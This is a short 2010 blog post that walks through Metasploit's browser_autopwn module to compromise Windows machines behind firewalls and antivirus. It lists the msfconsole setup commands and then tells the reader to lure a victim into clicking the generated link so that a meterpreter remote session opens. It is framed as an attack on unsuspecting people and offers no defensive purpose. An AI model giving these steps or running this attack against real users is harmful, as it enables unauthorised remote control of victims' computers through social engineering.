Monday, October 4, 2010

Invade Windows Machines that have Firewalls & Antivirus

Today I discovered a new things in my penetration testing that I just before I wrote this updates.I not sure if this exploit it rather new nor old but seem it works with windows machines.

As I used an auxiliary module to done the task.This module will create a URL/Links and you need to lure your victim to click the said link created upon exploit execution.Below is the setup needed to be done and I sorry this time Im not publishing the videos.

p/s : This module uses a combination of client-side and server-side
techniques to fingerprint HTTP clients and then automatically
exploit them.

========================================

msf>use auxiliary/server/browser_autopwn

set LHOST < Your Local IP >
set SRVHOST < Your Local IP >
set SRVPORT < 80 >
Set URIPATH < / > <--- default is random

exploit

wait till it finish loading and creating the said URL/Link

lure victim to click the said IP and ...

EUREKA!

A meterpreter sessions will establish

======================================

Happy trying.. :)

No comments:

Post a Comment